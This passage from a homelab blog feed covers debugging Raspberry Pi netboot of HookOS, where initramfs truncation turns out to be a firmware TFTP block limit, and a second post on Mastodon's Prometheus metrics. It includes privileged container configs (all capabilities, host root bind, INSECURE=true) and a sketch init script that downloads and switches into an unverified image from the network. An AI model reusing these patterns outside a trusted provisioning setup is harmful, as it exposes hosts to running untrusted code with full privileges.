</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#capabilities.add:</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#  - CAP_SYS_TIME # for ntp one-shot no-max-offset after ntpd, for hardware missing RTC&#39;s that boot in 1970</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds.add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/lib/dhcpcd:/var/lib/dhcpcd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/run:/run</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/ip/dhcp.sh:/etc/ip/dhcp.sh</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dhcpcd.conf:/dhcpcd.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">runtime</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mkdir</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/lib/dhcpcd</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">udev</span> <span style="color:#75715e"># as a service; so system reacts to changes in devices</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;${HOOK_CONTAINER_UDEV_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: [ <span style="color:#e6db74">&#34;/lib/systemd/systemd-udevd&#34;</span>, <span style="color:#e6db74">&#34;--debug&#34;</span> ]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>: [ <span style="color:#ae81ff">all ]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds</span>: [ <span style="color:#ae81ff">/dev:/dev, /sys:/sys, /lib/modules:/lib/modules ]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">rootfsPropagation</span>: <span style="color:#ae81ff">shared</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">net</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">pid</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">b</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">getty</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">linuxkit/getty:v1.0.0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds.add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/profile.d/local.sh:/etc/profile.d/local.sh</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/securetty:/etc/securetty</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/motd:/etc/motd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/os-release:/etc/os-release</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/:/host_root</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/run:/run</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dev:/dev</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dev/console:/dev/console</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/usr/bin/nerdctl:/usr/bin/nerdctl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">INSECURE=true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">b</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hook-docker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;${HOOK_CONTAINER_DOCKER_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">net</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">pid</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mounts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">cgroup2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">options</span>: [ <span style="color:#e6db74">&#34;rw&#34;</span>, <span style="color:#e6db74">&#34;nosuid&#34;</span>, <span style="color:#e6db74">&#34;noexec&#34;</span>, <span style="color:#e6db74">&#34;nodev&#34;</span>, <span style="color:#e6db74">&#34;relatime&#34;</span> ]
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">destination</span>: <span style="color:#ae81ff">/sys/fs/cgroup</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds.add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dev/console:/dev/console</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dev:/dev</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/resolv.conf:/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/lib/modules:/lib/modules</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/run/docker:/var/run</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/run/images:/var/lib/docker</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/run/worker:/worker</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/:/host_root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">runtime</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mkdir</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/run/images</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/run/docker</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/run/worker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">b</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hook-bootkit</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;${HOOK_CONTAINER_BOOTKIT_IMAGE}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">net</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mounts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">cgroup2</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">options</span>: [ <span style="color:#e6db74">&#34;rw&#34;</span>, <span style="color:#e6db74">&#34;nosuid&#34;</span>, <span style="color:#e6db74">&#34;noexec&#34;</span>, <span style="color:#e6db74">&#34;nodev&#34;</span>, <span style="color:#e6db74">&#34;relatime&#34;</span> ]
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">destination</span>: <span style="color:#ae81ff">/sys/fs/cgroup</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/run/docker:/var/run</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">runtime</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mkdir</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/run/docker</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">dhcpcd-daemon</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">linuxkit/dhcpcd:v1.0.0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: [ <span style="color:#e6db74">&#34;/etc/ip/dhcp.sh&#34;</span>, <span style="color:#e6db74">&#34;false&#34;</span> <span style="color:#f92672">] # 2nd paramter is one-shot true/false</span>: <span style="color:#66d9ef">true</span> <span style="color:#ae81ff">for onboot, false for services</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#capabilities.add:</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#  - CAP_SYS_TIME # for ntp one-shot no-max-offset after ntpd, for hardware missing RTC&#39;s that boot in 1970</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">binds.add</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/var/lib/dhcpcd:/var/lib/dhcpcd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/run:/run</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/etc/ip/dhcp.sh:/etc/ip/dhcp.sh</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/dhcpcd.conf:/dhcpcd.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">runtime</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mkdir</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">/var/lib/dhcpcd</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">files</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">etc/os-release</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0444&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">contents</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      NAME=&#34;HookOS&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      VERSION=${HOOK_VERSION}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ID=hookos
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      VERSION_ID=${HOOK_VERSION}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      PRETTY_NAME=&#34;HookOS ${HOOK_KERNEL_ID} v${HOOK_VERSION}/k${HOOK_KERNEL_VERSION}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ANSI_COLOR=&#34;1;34&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      HOME_URL=&#34;https://github.com/tinkerbell/hook&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">etc/securetty</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">contents</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ttyUSB0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ttyUSB1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ttyUSB2</span>
</span></span></code></pre></div><p>The above is only supposed to serve as an example, so I removed a lot of lines
and comments. If you&rsquo;d like to see the full file, have a look at the
<a href="https://github.com/tinkerbell/hook/blob/main/linuxkit-templates/hook.template.yaml">GitHub repo</a>.</p>
<p>My idea was to see whether I could get Getty to be put into the root of the
initramfs, instead of having it launched as a container. Looking at the YAML file,
I decided I would just try to move it from the <code>services:</code> list to the <code>init:</code>
list, like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">init</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">linuxkit/getty:v1.0.0</span>
</span></span></code></pre></div><p>And that actually worked! The other issues were still there - the image was
still truncated, but now Getty was coming early enough in the image to be in
the non-truncated part. I was now getting a prompt when booting into the initramfs.</p>
<p>Looking around, I still couldn&rsquo;t find any other obvious errors, just more
boot services which failed to start because their <code>config.json</code> files became
victims of the truncation. But I at least had another piece of proof that
truncation was happening: the total size of the unpacked initramfs on my VM was
603 MB, while checking the <code>/</code> size in the booted initramfs only
showed 404 MB total. Weirdly, part of that 404 MB was a 90 MB <code>initrd.img</code> file
in <code>/</code> which I couldn&rsquo;t make heads or tails of. The file definitely wasn&rsquo;t
from the actual initramfs, and Google wasn&rsquo;t able to tell me where it came from
or what was in it either.</p>
<p>Anyone got any idea what that <code>initrd.img</code> file suddenly appearing in my initramfs
might be?</p>
<p>At this point it was pretty clear that I was having a truncation problem. But after
googling a bit, the next question was: where does the truncation actually happen?</p>
<h2 id="figuring-out-whos-truncating">Figuring out who&rsquo;s truncating</h2>
<p>Initial searches pointed me towards TFTP as the culprit. The <a href="https://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol">Wikipedia article</a>
has this to say:</p>
<blockquote>
<p>The original protocol has a transfer file size limit of 512 bytes/block x 65535 blocks = 32 MB. In 1998 this limit was extended to 65535 bytes/block x 65535 blocks = 4 GB by TFTP Blocksize Option RFC 2348. [&hellip;] If TFTP packets should be kept within the standard Ethernet MTU (1500), the blocksize value is calculated as 1500 minus headers of TFTP (4 bytes), UDP (8 bytes) and IP (20 bytes) = 1468 bytes/block, this gives a limit of 1468 bytes/block x 65535 blocks = 92 MB. Today most servers and clients support block number roll-over (block counter going back to 0 or 1[10] after 65535) which gives an essentially unlimited transfer file size.</p></blockquote>
<p>So it looked like, unless block number roll-over was implemented in the Pi
firmware, the maximum file size would be 92 MB. To try to verify that, I took
a tcpdump from the transfer of a 155 MB initramfs.
Here is the option acknowledgment packet:</p>
<p><figure>
    <img loading="lazy" src="read-req-ack.png"
         alt="A screenshot of a Wireshark packet output. It shows the TFTP content of the packet. The destination file is named as &#39;initramfs-armbian-bcm2711-legacy&#39;, the blksize option is 1468 and the tsize is 155222922 bytes."/> <figcaption>
            <p>Acknowledged options for the initramsfs transfer</p>
        </figcaption>
</figure>

So the blocksize is getting negotiated properly to the maximum size in my 1500 byte
MTU network, and the total size of 155 MB is also set correctly, it seems.</p>
<p>And here is the end of the transmission:
<figure>
    <img loading="lazy" src="read-finished.png"
         alt="A screenshot of a Wireshark packet output. It shows the end of the transfer, with a total of 105738 TFTP fragments and 155222922 bytes of data, exactly the same number as the tsize option from the start of the transmission. It also shows the actual block number as 40202."/> <figcaption>
            <p>Final data packet of the TFTP transfer for the initramfs</p>
        </figcaption>
</figure>

This output shows two things: First, exactly as many bytes were transferred as the
<code>tsize</code> option in the option acknowledgment at the start announced. Second, a lot
more blocks (105738) were transferred than the maximum block number of 65535. The
actual block number of the last block was 40202, which indicates that the
previously mentioned block number roll-over was working as intended.
<p>Overall, it did look like the entire file got transferred correctly.</p>
<p>So the next possibility was that something goes wrong after the transfer.
For that, I had to have a look at the Pi&rsquo;s early boot process. First, I enabled
the <code>BOOT_UART=1</code> option. This option lives in the Pi&rsquo;s firmware config stored in
EEPROM, so it needs to be set via the <code>rpi-eeprom-config</code> script from a running
Linux; it cannot be set via the <code>config.txt</code> file. Once I had that, I got the
first disappointment, as the output just stopped past this point:</p>
<pre tabindex="0"><code>TFTP_GET: aa:ce:d5:6e:90:cd 203.0.113.18 start4.elf

RX: 12 IP: 0 IPV4: 10 MAC: 10 UDP: 10 UDP RECV: 10 IP_CSUM_ERR: 0 UDP_CSUM_ERR: 0
TFTP: complete 2256224
RX: 14 IP: 0 IPV4: 12 MAC: 12 UDP: 12 UDP RECV: 12 IP_CSUM_ERR: 0 UDP_CSUM_ERR: 0
Read start4.elf bytes  2256224 hnd 0x0
[...]
Starting start4.elf @ 0xfec00200 partition -1
</code></pre><p>The output only resumed when the kernel started booting. To get output from
the <code>start4.elf</code> execution, I had to add another option, <a href="https://www.raspberrypi.com/documentation/computers/config_txt.html#uart_2ndstage">uart_2ndstage</a>. Luckily, this option can be set in the <code>config.txt</code> file, so no further trip
into Linux was necessary.</p>
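<p>In the <code>config.txt</code> file, that is just one additional line:</p>
<pre tabindex="0"><code>uart_2ndstage=1
</code></pre>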
<p>That finally delivered the answer to the question of where the truncation
happens, in the form of this message:</p>
<pre tabindex="0"><code>MESS:00:00:55.768976:0: initramfs loaded to 0x29440000 (size 0x5bbfa44)
</code></pre><p>The size given here, 0x5bbfa44, is 96,205,380 bytes, which is exactly 1468 bytes/block
x 65535 blocks: the limit from the Wikipedia quote above for a TFTP transfer without
block number roll-over. So even though the file was larger, and it looked like the
whole thing went over the wire, the Pi&rsquo;s firmware apparently only kept the first
65535 blocks, roughly 96 MB, in memory for the kernel to use. And that&rsquo;s where the
truncation was coming from.</p>
<h2 id="new-plan">New plan</h2>
<p>So I needed a new plan. I think the most reasonable next approach would be to
turn the boot process into a two-stage setup: the first stage is a small initramfs,
containing only the tools needed to download the second stage, the full HookOS
initramfs, and to then pivot into that new image.</p>
<p>One problem is that I don&rsquo;t want to hardcode the address/name of the second-stage
image into the first-stage initramfs. One possibility would be to pass it as a
kernel command line option, as the kernel forwards all options it doesn&rsquo;t
recognize to the <code>init</code> binary it executes after startup.</p>
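<p>To illustrate the idea, a first stage along these lines is what I have in mind.
This is an untested sketch, and the <code>stage2_url=</code> option name, the download
tooling and the exact mounts are all placeholders:</p>
<pre tabindex="0"><code>#!/bin/sh
# Hypothetical first-stage /init: fetch the full HookOS initramfs and pivot into it.
# Assumes the network has already been brought up, e.g. via the kernel&#39;s ip= option.
mount -t proc proc /proc
mount -t devtmpfs dev /dev

# Pick the (made-up) stage2_url= option off the kernel command line.
for opt in $(cat /proc/cmdline); do
    case &#34;$opt&#34; in
        stage2_url=*) STAGE2_URL=&#34;${opt#stage2_url=}&#34; ;;
    esac
done

# Unpack the full initramfs into a tmpfs and switch into it.
mkdir -p /newroot
mount -t tmpfs tmpfs /newroot
wget -O - &#34;$STAGE2_URL&#34; | gunzip -c | (cd /newroot &amp;&amp; cpio -idm)

exec switch_root /newroot /init
</code></pre>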
<p>This approach has the advantage that the overall HookOS process doesn&rsquo;t need to
be changed. The original initramfs can be left entirely untouched and never needs
to know that there was another boot stage for specific boards.</p>
<p>Testing that will be my next task. I wanted to get this post out first because
I felt that adding the description of those experiments and the explanation of the
eventual solution on top of the investigation above would turn this into another
one of my tomes. And the &ldquo;posts, not tomes&rdquo; project is still in effect. &#x1f601;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Configuring Mastodon Prometheus Metrics</title>
      <link>https://blog.mei-home.net/posts/mastodon-prom-metrics/</link>
      <pubDate>Sat, 12 Jul 2025 22:50:45 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/mastodon-prom-metrics/</guid>
      <description>Gathering Mastodon sidekiq metrics with Prometheus</description>
      <content:encoded><![CDATA[<p>With release <a href="https://github.com/mastodon/mastodon/releases/tag/v4.4.0">4.4.0</a>
Mastodon introduced a Prometheus exporter. In this post, I will configure it
and show the data it provides.</p>
<p>With the new release, Mastodon provides metrics from Ruby and Sidekiq. I&rsquo;ve
attached examples for both to this post, see <a href="ruby.txt">here for Ruby</a> and
<a href="sidekiq.txt">here for Sidekiq</a>.</p>
<p>The information is not actually that interesting; it&rsquo;s mostly generic process
data. But I did find at least the Sidekiq data worth gathering. It will provide
an interesting future look into my usage of Mastodon and perhaps even the
overall activity in the Fediverse (or at least the part I&rsquo;m connected to).</p>
<p>I&rsquo;m running Mastodon via the <a href="https://github.com/mastodon/chart">official Helm chart</a>,
so I enabled the metrics exporters via the <code>values.yaml</code> file like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mastodon</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">statsd</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exporter</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sidekiq</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">detailed</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>As I&rsquo;ve noted above, I didn&rsquo;t find the Ruby data interesting at all, so I did
not enable the detailed data for that.</p>
<p>Enabling the Prometheus exporter adds containers running the exporter to the
Sidekiq and Web Pods. Both listen on port <code>9394</code> by default. These ports are not
added to any Services.</p>
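<p>For a quick first look at the output, a port-forward directly to one of the Pods
does the job. The namespace and Deployment name here are illustrative, adjust them
to your deployment:</p>
<pre tabindex="0"><code>kubectl -n mastodon port-forward deployment/mastodon-sidekiq-all-queues 9394:9394
curl -s http://localhost:9394/metrics | head
</code></pre>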
<p>To instruct my Prometheus instance to scrape the endpoints, I created a
<a href="https://prometheus-operator.dev/docs/api-reference/api/#monitoring.coreos.com/v1.PodMonitor">PodMonitor</a>
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PodMonitor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">sidekiq-metrics</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/component</span>: <span style="color:#ae81ff">sidekiq-all-queues</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/instance</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">mastodon</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podMetricsEndpoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">port</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/metrics</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">1m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">collector_.*</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">heap_.*</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">rss</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">malloc_increase_bytes_limit</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">oldmalloc_increase_bytes_limit</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">major_gc_ops_total</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">minor_gc_ops_total</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">allocated_objects_total</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">sidekiq_job_duration_seconds.*</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">active_record_connection_pool.*</span>
</span></span></code></pre></div><p>Nothing really special about it, apart from dropping a couple of metrics at
ingestion that I did not find particularly interesting.</p>
<p>One note: If you&rsquo;ve got network policies in use, make sure that your Prometheus
instance can actually reach the Mastodon Pods.</p>
